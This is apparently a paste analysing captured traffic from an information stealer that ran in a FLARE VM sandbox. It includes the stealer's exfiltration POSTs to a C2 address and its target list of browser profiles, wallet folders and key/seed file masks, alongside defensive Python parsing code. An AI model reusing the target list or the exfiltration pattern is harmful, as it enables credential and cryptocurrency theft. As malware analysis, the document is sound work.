From Eratic Goat, 2 Years ago, written in Plain Text.
This paste is a reply to Re: Encoded And Decoded Strings Wireshark Traffic from Paltry Kangaroo
....P%http://tempuri.org/Entity/Id1Response.Id1Response.http://tempuri.org/        Id1ResultV...POST /8vcWxwwx3/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.151
Content-Length: 21
Cache-Control: no-cache

id=795348421152&cred=HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 11 Jan 2023 22:18:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php

0

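Interleaved with the HTTP exchange, this dump carries a second, binary-framed stream. Its readable parts are .NET serialization names (`http://tempuri.org/Entity/Id1Response`, `http://schemas.microsoft.com/2003/10/Serialization/Arrays`) and, further down inside the upload, the collector's target list: `%userprofile%\Desktop|*.txt,*.doc*,*key*,*wallet*,*seed*|0`, several dozen `%USERPROFILE%\AppData\...\User Data` browser profile paths, and wallet directories under `%appdata%`. Every one of those strings is preceded by a one-byte length: the `%` in front of `http://tempuri.org/Entity/Id1Response` is 0x25 = 37, the string's length; the tab in front of `Id1Result` is 0x09 = 9; the `:` in front of the Desktop rule is 0x3A = 58. A plain `strings`-style pass ignores that byte and glues neighbouring records together (`...|0F..<%userprofile%\Documents...`), while honouring it separates them cleanly. The example below is added here and is not part of the paste. Its input blob is constructed to mimic that layout (the filler bytes between records are a guess at the framing, not taken from the capture); it carves the length-prefixed strings, splits the `path|masks|flag` rules into fields, and contrasts the result with naive printable runs.

```python
import re

# Added example, not code from the paste. SAMPLE is CONSTRUCTED to mimic the layout
# seen in the dump: a one-byte length in front of every readable string. The filler
# bytes between records ("F\x01\x98", "E\x00\x00c") are a guess at the framing.
def _rec(s: bytes) -> bytes:
    return b"F\x01\x98" + bytes([len(s)]) + s

SAMPLE = (
    b"\x00\x00\x00\x00P" + bytes([37]) + b"http://tempuri.org/Entity/Id1Response"
    + bytes([11]) + b"Id1Response" + bytes([19]) + b"http://tempuri.org/"
    + bytes([9]) + b"Id1Result" + b"V\x00\x00E\x00\x00c"
    + _rec(b"%userprofile%\\Desktop|*.txt,*.doc*,*key*,*wallet*,*seed*|0")
    + _rec(b"%userprofile%\\Documents|*.txt,*.doc*,*key*,*wallet*,*seed*|0")
    + b"\x00E\x00\x00c"
    + _rec(b"%USERPROFILE%\\AppData\\Local\\Google\\Chrome\\User Data")
    + _rec(b"%USERPROFILE%\\AppData\\Roaming\\Mozilla\\Firefox")
    + b"\x00\x00"
)

INTEREST = re.compile(rb"^(%[A-Za-z]+%|https?://|Id\d+)")  # how a record of interest may start
RULE = re.compile(r"^(%[A-Za-z]+%[^|]*)\|([^|]*)\|(\d+)$")  # grabber rule: path|masks|flag

def carve_length_prefixed(data: bytes, lo: int = 5, hi: int = 127) -> list:
    """Return (offset, text) for every printable run whose preceding byte equals its length.

    Scanning resumes after an accepted record, so neighbouring records such as
    "...|0" and "%userprofile%\\Documents..." are never glued together.
    """
    hits, i = [], 0
    while i < len(data):
        n = data[i]
        chunk = data[i + 1:i + 1 + n]
        if lo <= n <= hi and len(chunk) == n and all(0x20 <= b < 0x7f for b in chunk) and INTEREST.match(chunk):
            hits.append((i + 1, chunk.decode("ascii")))
            i += 1 + n
        else:
            i += 1
    return hits

def classify(hits) -> list:
    """Split grabber rules into fields and tag everything else as path / contract / name."""
    out = []
    for off, s in hits:
        m = RULE.match(s)
        if m:
            out.append({"offset": off, "kind": "rule", "path": m.group(1),
                        "masks": m.group(2).split(","), "flag": int(m.group(3))})
        else:
            kind = "path" if s.startswith("%") else "contract" if s.startswith("http") else "name"
            out.append({"offset": off, "kind": kind, "value": s})
    return out

def naive_runs(data: bytes, minlen: int = 5) -> list:
    """What a plain strings-style pass sees: printable runs with the record boundaries lost."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % minlen, data)]

if __name__ == "__main__":
    for item in classify(carve_length_prefixed(SAMPLE)):
        print(item)
    print("naive runs:", naive_runs(SAMPLE))
```

Run against a real follow-stream export, `carve_length_prefixed` gives you the target paths and file masks as discrete records, and the `flag` field of each rule (0 in both Desktop and Documents rules here) can be checked against the configuration rather than guessed from a merged string.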
POST /8vcWxwwx3/index.php?wal=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----NzY4MA==
Host: 62.204.41.151
Content-Length: 7840
Cache-Control: no-cache

------NzY4MA==
Content-Disposition: form-data; name="data"; filename="795348421152_Desktop.tar"
Content-Type: application/octet-stream

Users/vm/AppData/Local/Temp/_Files_/available_packages.txt..........................................000666 .000000 .000000 .00000004254 14344065737 022125. 0....................................................................................................ustar.00................................................................000000 .000000 ..........................................................................................................................................................................0.1.0.e.d.i.t.o.r...v.m.|.1.2...0...1.
.
.7.z.i.p.-.1.5.-.0.5...v.m.|.1.5...0.5.
.
.a.p.i.m.o.n.i.t.o.r...v.m.|.2...1.3...0...2.0.2.2.0.2.2.4.
.
.a.p.k.t.o.o.l...v.m.|.2...7...0.
.
.a.s.r.e.p.r.o.a.s.t...v.m.|.0...0...0...2.0.1.8.0.9.2.5.
.
.b.l.o.o.d.h.o.u.n.d...v.m.|.4...2...0.
.
.c.a.p.a...v.m.|.4...0...1.
.
.c.m.d.e.r...v.m.|.1...3...2.0...2.0.2.2.1.2.0.1.
.
.c.o.m.m.o.n...v.m.|.0...0...0...2.0.2.2.1.2.0.1.
.
.c.y.b.e.r.c.h.e.f...v.m.|.9...4.9...0...2.0.2.2.1.2.0.1.
.
.c.y.g.w.i.n...v.m.|.3...2...0...2.0.2.2.1.2.0.1.
.
.d.i.e...v.m.|.3...0.2...2.0.2.2.0.1.1.3.
.
.d.n.s.p.y.e.x...v.m.|.6...2...0.
.
.e.x.p.l.o.r.e.r.s.u.i.t.e...v.m.|.0...0...0...2.0.2.2.1.1.1.5.
.
.f.a.k.e.n.e.t.-.n.g...v.m.|.1...4...1.1...2.0.2.2.1.1.1.5.
.
.f.l.a.r.e.v.m...i.n.s.t.a.l.l.e.r...v.m.|.0...0...0...2.0.2.2.1.2.0.1.
.
.f.l.o.s.
s...v.m.|.2...1...0.
.
.g.h.i.d.r.a...v.m.|.1.0...1...2.
.
.g.o.b.u.s.t.e.r...v.m.|.3...0...1...2.0.2.2.0.1.1.3.
.
.h.
a.V.D
.....D...&R..\.A.`.Z`:@.D.......V.B.
.B..........%http://tempuri.org/Entity/Id2Response.Id2Response        Id2Result.Entity)http://www.w3.org/2001/XMLSchema-instance.Id1.Id109http://schemas.microsoft.com/2003/10/Serialization/Arrays.string.Id11.Id12.Id13.Entity17.Id2.Id3.Entity16.Id4.Id5.Id6.Id7.Id8.Id9V...
s.h.m.y.f.i.l.e.s...v.m.|.0...0...0...2.0.2.2.0.1.1.3.
.
.i.d.
a.V.D
....        D......?^ZD.9m.ux..D.......V.B.
.B
..b...
f.r.e.e...v.m.|.7...6.
.
.l.
i.E..E...c.F..:%userprofile%\Desktop|*.txt,*.doc*,*key*,*wallet*,*seed*|0F..<%userprofile%\Documents|*.txt,*.doc*,*key*,*wallet*,*seed*|0.E...c.F..&%USERPROFILE%\AppData\Local\Battle.netF...%USERPROFILE%\AppData\Local\Chromium\User DataF..3%USERPROFILE%\AppData\Local\Google\Chrome\User DataF..8%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User DataF..-%USERPROFILE%\AppData\Roaming\Opera Software\F..<%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User DataF..-%USERPROFILE%\AppData\Local\Iridium\User DataF..1%USERPROFILE%\AppData\Local\7Star\7Star\User DataF..1%USERPROFILE%\AppData\Local\CentBrowser\User DataF..,%USERPROFILE%\AppData\Local\Chedot\User DataF..-%USERPROFILE%\AppData\Local\Vivaldi\User DataF..,%USERPROFILE%\AppData\Local\Kometa\User DataF..6%USERPROFILE%\AppData\Local\Elements Browser\User DataF..:%USERPROFILE%\AppData\Local\Epic Privacy Browser\User DataF..4%USERPROFILE%\AppData\Local\uCozMedia\Uran\User DataF..O%USERPROFILE%\AppData\Local\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewerF..:%USERPROFILE%\AppData\Local\CatalinaGroup\Citrio\User DataF..3%USERPROFILE%\AppData\Local\Coowon\Coowon\User DataF..,%USERPROFILE%\AppData\Local\liebao\User DataF...%USERPROFILE%\AppData\Local\QIP Surf\User DataF..-%USERPROFILE%\AppData\Local\Orbitum\User DataF..3%USERPROFILE%\AppData\Local\Comodo\Dragon\User DataF..0%USERPROFILE%\AppData\Local\Amigo\User\User DataF..+%USERPROFILE%\AppData\Local\Torch\User DataF..:%USERPROFILE%\AppData\Local\Yandex\YandexBrowser\User DataF..,%USERPROFILE%\AppData\Local\Comodo\User DataF..8%USERPROFILE%\AppData\Local\360Browser\Browser\User DataF...%USERPROFILE%\AppData\Local\Maxthon3\User DataF..-%USERPROFILE%\AppData\Local\K-Melon\User DataF..5%USERPROFILE%\AppData\Local\Sputnik\Sputnik\User DataF...%USERPROFILE%\AppData\Local\Nichrome\User DataF..4%USERPROFILE%\AppData\Local\CocCoc\Browser\User DataF..*%USERPROFILE%\AppData\Local\Uran\User DataF...%USERPROFILE%\AppData\Local\Chromodo\User 
DataF..2%USERPROFILE%\AppData\Local\Mail.Ru\Atom\User DataF..A%USERPROFILE%\AppData\Local\BraveSoftware\Brave-Browser\User DataF..4%USERPROFILE%\AppData\Local\Microsoft\Edge\User DataF..H%USERPROFILE%\AppData\Local\NVIDIA Corporation\NVIDIA GeForce ExperienceF..!%USERPROFILE%\AppData\Local\SteamF..7%USERPROFILE%\AppData\Local\CryptoTab Browser\User Data.E...c.F..-%USERPROFILE%\AppData\Roaming\Mozilla\FirefoxF..&%USERPROFILE%\AppData\Roaming\WaterfoxF..&%USERPROFILE%\AppData\Roaming\K-MeleonF..)%USERPROFILE%\AppData\Roaming\ThunderbirdF...%USERPROFILE%\AppData\Roaming\Comodo\IceDragonF..3%USERPROFILE%\AppData\Roaming\8pecxstudios\CyberfoxF..;%USERPROFILE%\AppData\Roaming\NETGATE Technologies\BlackHawF..=%USERPROFILE%\AppData\Roaming\Moonchild Productions\Pale Moon.E.E!E...ArmoryE#.        %appdata%E%E'E...ArmoryE#..*.walletE%....E!E...AtomicE#.        %appdata%E%E'E...atomicE#..*E%....E!E...BinanceE#.        %appdata%E%E'E...BinanceE#..*app-store*E%....E!E...CoinomiE#.        %appdata%E%E'E...CoinomiE#..*E%....E!E...ElectrumE#.        %appdata%E%E'E...Electrum\walletsE#..*E%....E!E...EthereumE#.        %appdata%E%E'E...Ethereum\walletsE#..*E%....E!E...ExodusE#.        %appdata%E%E'E...Exodus\exodus.walletE#..*E%..E'E...ExodusE#..*.jsonE%....E!E...GuardaE#.        %appdata%E%E'E...GuardaE#..*E%....E!E...JaxxE#.        %appdata%E%E'E...com.liberty.jaxxE#..*E%....E!E...MoneroE#..%userprofile%\DocumentsE%E'E...Monero\walletsE#..*E%.....E#.E%.E).E+.E-.E/.E1.E3......{<%http://tempuri.org/Entity/Id4Response.Id4Response        Id4ResultV...b.r.a.r.i.e.s...p.y.t.h.o.n.2...v.m.|.0...0...0...2.0.2.2.1.2.0.3.
.
.l.i.b.r.
a.V.D
....5D....5.qU.I.im.....D.......V.B7
.B9..Id2....~?&http://tempuri.org/Entity/Id10Response.Id10Response
Id10ResultV...
r.i.e.s...p.y.t.h.o.n.3...v.m.|.0...0...0...2.0.2.2.1.2.0.3.
.
.m.
a.V.D
....;[email protected]=
.B?..Id2....~?&http://tempuri.org/Entity/Id11Response.Id11Response
Id11ResultV...
p...v.m.|.0...2.4.
.
.n.e.t.w.o.r.k.m.i.n.e.r...v.m.|.2...7...3.
.
.n.o.t.e.p.a.d.p.l.u.s.p.l.u.
s...v.m.|.8...4...7...2.0.2.2.1.1.2.9.
.
.n.o.t.e.p.
a.V.D
....AD.....*le.N._2Q...#D.......V.BC
.BE..Id2....~?&http://tempuri.org/Entity/Id21Response.Id21Response
Id21ResultV...
d.p.p...p.l.u.g.i.n...c.o.m.p.a.r.e...v.m.|.2...0...1...2.0.2.1.1.2.2.5.
.
.o.l.l.y.d.b.g...o.l.l.y.d.u.m.p.e.x...v.m.|.1...8.0.
.
.o.l.l.y.d.b.g...v.m.|.1...1.0...0...2.0.2.2.0.9.0.8.
.
.o.l.l.y.d.b.g.2...o.l.l.y.d.u.m.p.e.x...v.m.|.1...8.0.
.
.o.l.l.y.d.b.g.2...v.m.|.2...0.1.
.
.p.e.i.d...v.m.|.0...9.5...0...2.0.2.2.1.1.1.5.
.
.p.r.o.c.e.s.s.d.u.m.p...v.m.|.2...1...1...2.0.2.2.0.9.0.8.
.
.r.e.g.s.h.o.t...v.m.|.1...9...1.
.
.r.u.n.d.o.t.n.e.t.d.l.l...v.m.|.2...2.
.
.s.y.s.i.n.t.e.r.n.a.l.
s...v.m.|.2.0.2.2...1.1...2.8...2.0.2.2.1.2.0.1.
.
.u.n.i.e.x.t.r.
a.V.D
....GD....{8...J.fS..k{.D.......V.BI
.BK..Id2....{<%http://tempuri.org/Entity/Id9Response.Id9Response        Id9ResultV...
c.t.2...v.m.|.2...0...0...2.0.2.2.0.1.1.3.
.
.v.c.b.u.i.l.d.t.o.o.l.
s...v.m.|.0...0...0...2.0.2.2.1.2.0.1.
.
.w.i.r.e.s.h.
a.V.D
....MD...3..y.YI.....I..D.......V.BO
.BQ..Id2....~?&http://tempuri.org/Entity/Id15Response.Id15Response
Id15ResultV...s...a.V.D
....SD...wT.m..M..{c...\D.......V.BU
.BW..Id2....~?&http://tempuri.org/Entity/Id16Response.Id16Response
Id16ResultV...s...a.V.D
....YD...//.OluC.Y..>.O.D.......V.B[
.B]..Id2....~?&http://tempuri.org/Entity/Id17Response.Id17Response
Id17ResultV...s...a.V.D
...._D...C.....J...y)?.MD.......V.Ba
.Bc..Id2....~?&http://tempuri.org/Entity/Id18Response.Id18Response
Id18ResultV...s...a.V.D
....eD.........N..$.;@..D.......V.Bg
.Bi..Id2....~?&http://tempuri.org/Entity/Id19Response.Id19Response
Id19ResultV...s...a.V.D
[email protected]./.M.ED.......V.Bm
.Bo..Id2....{<%http://tempuri.org/Entity/Id6Response.Id6Response        Id6ResultV...s...a.V.D
....qD...I.....K..g..-!.D.......V.Bs
.Bu..Id2....~?&http://tempuri.org/Entity/Id14Response.Id14Response
Id14ResultV...s...a.V.D
....wD..Tu....>J...w.Ph.D.......V.By
.B{..Id2.....?&http://tempuri.org/Entity/Id20Response.Id20Response
Id20ResultV...s...a.V.D
....}D......O..O.....X..D.......V.B.
.B....Id2....~<%http://tempuri.org/Entity/Id7Response.Id7Response        Id7ResultV...s...a.V.D
......D..g..q..+@...
r.k...v.m.|.3...6...0...2.0.2.2.1.2.0.2.
.
.x.6.4.d.b.
g...!D.......V.B..
.B....Id2......?&http://tempuri.org/Entity/Id13Response.Id13Response
Id13ResultV...s...a.V.D
......D..7..T
..J..2J...:D.......V.B..
.B....Id2....~<%http://tempuri.org/Entity/Id8Response.Id8Response        Id8ResultV...s...a.V.D
......D..E.7.
o.l.l.y.d.u.m.p.e.x...v.m.|.1...8.0.
.
.x.
6.yF..w....RD.......V.B..
.B....Id2......?&http://tempuri.org/Entity/Id12Response.Id12Response
Id12ResultV...s...a.V.D
......D..)
.l.
4.d.b.g...v.m.|.B...Tp...D.......V.B..
.B....Id2....n4&http://tempuri.org/Entity/Id22Response.Id22ResponseV...s...a.V.D
......D......& .L........D.......V.B..
....
2.0.2.1...0.5...0.8.
.
.x.6.4.d.b.g.p.y...v.m.|.1...0...5.6...2.0.2.1.1.0.2.1.
.
.....................................................................................................................................................................................................................................................................................................................................................Users/vm/AppData/Local/Temp/_Files_/failed_packages.txt.............................................000666 .000000 .000000 .00000000226 14344401701 021405. 0....................................................................................................ustar.00................................................................000000 .000000 ........................................................................................................................................................................ghidra
Cygwin
python3

wireshark
GoogleChrome
ghidra
Cygwin
python3
wireshark
GoogleChrome
ghidra
Cygwin
python3
wireshark
GoogleChrome
..........................................................................................................................................................................................................................................................................................................................................................................Users/vm/AppData/Local/Temp/_Files_/README.txt......................................................000666 .000000 .000000 .00000003053 14344541053 017266. 0....................................................................................................ustar.00................................................................000000 .000000 ........................................................................................................................................................................        ______ _               _____  ______   __      ____  __ 
       |  ____| |        /\   |  __ \|  ____|  \ \    / /  \/  |
       | |__  | |       /  \  | |__) | |__ _____\ \  / /| \  / |
       |  __| | |      / /\ \ |  _  /|  __|______\ \/ / | |\/| |
       | |    | |____ / ____ \| | \ \| |____      \  /  | |  | |
       |_|    |______/_/    \_\_|  \_\______|      \/   |_|  |_|
            M A L W A R E   A N A L Y S I S   E D I T I O N                                                                              
        ________________________________________________________
                               Developed by                         
             FLARE (FireEye Labs Advanced Reverse Engineering)
                          flarevm@fireeye.com
        ________________________________________________________ 
                                                         
Welcome to FLARE VM - Malware Analysis Edition! The distribution contains a
number of tools and configurations to enhance malware analysis and reverse
engineering tasks.

Please change the virtual machine network mode to Host Only to prevent malware
from escaping the environment. Finally, take a snapshot so that you could always
revert to a clean image.

You can customize the image by downloading additional packages. For example, to 
install Firefox simply type the following:

  cinst firefox

To keep the distribution up to date, restore networking to NAT or Bridge and type 
in the following command in the Administrator console:

  cup all

Happy Reversing!
.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
------NzY4MA==--
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 11 Jan 2023 22:18:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

0
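The two POSTs above are the whole exfiltration exchange: a check-in whose body is `id=795348421152&cred=` (21 bytes, matching its Content-Length), answered with `Refresh: 0; url = Login.php`, then a `?wal=1` multipart upload whose `data` field is `795348421152_Desktop.tar`, the same id reused as the filename prefix. The tar's text members (`available_packages.txt` and the others under `Users/vm/AppData/Local/Temp/_Files_/`) are UTF-16LE, which is why they render as `.0.1.0.e.d.i.t.o.r.` in the dump: every other byte is a NUL. The following is an added example, not part of the paste. It rebuilds an equivalent stream in memory (constructed: same paths, boundary, field name and filename pattern, but a tiny synthetic tar instead of the real 7840-byte upload) and shows how to split a follow-stream buffer into HTTP messages, pull the uploaded file out of the multipart body, open the tar, decode its members, and confirm that the upload filename carries the check-in id.

```python
import io
import re
import tarfile
# Added example, not code from the paste. The traffic is CONSTRUCTED to mirror the
# captured exchange (same path, boundary, field name and filename pattern) with a
# tiny synthetic tar in place of the real 7840-byte upload.
CHECKIN_ID = b"795348421152"  # id seen in the dump

def _build_tar() -> bytes:
    """Stand-in for <id>_Desktop.tar; the package list is UTF-16 like the real one."""
    files = {
        "Users/vm/AppData/Local/Temp/_Files_/available_packages.txt":
            "010editor.vm|12.0.1\r\n7zip-15-05.vm|15.05\r\nghidra.vm|10.1.2\r\n".encode("utf-16"),
        "Users/vm/AppData/Local/Temp/_Files_/failed_packages.txt": b"ghidra\nCygwin\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def _build_stream() -> bytes:
    """Check-in POST, reply, multipart upload, reply: the order seen in the dump."""
    body1 = b"id=" + CHECKIN_ID + b"&cred="
    req1 = (b"POST /8vcWxwwx3/index.php HTTP/1.1\r\nHost: 62.204.41.151\r\nContent-Type: "
            b"application/x-www-form-urlencoded\r\nContent-Length: %d\r\n\r\n" % len(body1) + body1)
    resp1 = (b"HTTP/1.1 200 OK\r\nServer: nginx/1.18.0 (Ubuntu)\r\nTransfer-Encoding: chunked\r\n"
             b"Refresh: 0; url = Login.php\r\n\r\n0\r\n\r\n")
    part = (b'------NzY4MA==\r\nContent-Disposition: form-data; name="data"; filename="' + CHECKIN_ID
            + b'_Desktop.tar"\r\nContent-Type: application/octet-stream\r\n\r\n' + _build_tar()
            + b"\r\n------NzY4MA==--\r\n")
    req2 = (b"POST /8vcWxwwx3/index.php?wal=1 HTTP/1.1\r\nHost: 62.204.41.151\r\nContent-Type: "
            b"multipart/form-data; boundary=----NzY4MA==\r\nContent-Length: %d\r\n\r\n" % len(part) + part)
    return req1 + resp1 + req2 + b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n"

def parse_http_messages(stream: bytes) -> list:
    """Split a follow-stream buffer into messages, honouring Content-Length and chunked framing."""
    msgs, pos = [], 0
    while (end := stream.find(b"\r\n\r\n", pos)) >= 0:
        lines = stream[pos:end].decode("latin-1").split("\r\n")
        hdrs = {k.strip().lower(): v.strip() for k, _, v in (l.partition(":") for l in lines[1:])}
        pos, body = end + 4, b""
        if hdrs.get("transfer-encoding", "").lower() == "chunked":
            while True:
                nl = stream.index(b"\r\n", pos)
                size = int(stream[pos:nl].split(b";")[0], 16)
                pos = nl + 2
                if size == 0:
                    pos = stream.index(b"\r\n", pos) + 2  # skip the (empty) trailer section
                    break
                body, pos = body + stream[pos:pos + size], pos + size + 2
        else:
            n = int(hdrs.get("content-length", "0"))
            body, pos = stream[pos:pos + n], pos + n
        msgs.append({"start": lines[0], "headers": hdrs, "body": body})
    return msgs

def extract_upload(msg: dict):
    """Return (filename, bytes) of the multipart field named "data", or None."""
    m = re.search(r"boundary=(\S+)", msg["headers"].get("content-type", ""))
    if not m:
        return None
    for part in msg["body"].split(b"--" + m.group(1).encode())[1:]:
        if part.startswith(b"--"):
            break  # closing delimiter
        head, _, data = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        fn = re.search(r'name="data".*?filename="([^"]*)"', head.decode("latin-1"))
        if fn:
            return fn.group(1), data[:-2] if data.endswith(b"\r\n") else data
    return None

def decode_tar_members(tar_bytes: bytes) -> dict:
    """name -> text for each regular file; NUL-heavy content is UTF-16LE (the ".x.y.z" look in the dump)."""
    out = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tf:
        for info in tf.getmembers():
            if (f := tf.extractfile(info)) is not None:
                data = f.read()
                utf16 = data.count(0) > len(data) // 3
                out[info.name] = data.decode("utf-16-le" if utf16 else "utf-8", "replace").lstrip("\ufeff")
    return out

def analyze(stream: bytes) -> dict:
    """Tie the check-in id to the upload filename and list the packages the victim had installed."""
    res = {"checkin_id": None, "upload_name": None, "files": {}}
    for msg in parse_http_messages(stream):
        if not msg["start"].startswith("POST "):
            continue
        if (ck := re.fullmatch(rb"id=(\d+)&cred=(.*)", msg["body"], re.S)):
            res["checkin_id"] = ck.group(1).decode()
        elif (up := extract_upload(msg)):
            res["upload_name"], tar = up
            res["files"] = decode_tar_members(tar)
    pkgs = next((t for n, t in res["files"].items() if n.endswith("available_packages.txt")), "")
    res["packages"] = [tuple(l.split("|", 1)) for l in pkgs.splitlines() if "|" in l]
    res["ids_match"] = bool(res["checkin_id"] and (res["upload_name"] or "").startswith(res["checkin_id"] + "_"))
    return res

if __name__ == "__main__":
    print(analyze(_build_stream()))
```

On a real export, feed `parse_http_messages` the raw bytes of the HTTP conversation (Wireshark's "Follow TCP Stream", saved as raw); the `ids_match` check is the quick way to confirm that a check-in and an upload belong to the same victim session, and `packages` is the list the dump shows in UTF-16 form, which here reveals a FLARE VM analysis box was the "victim".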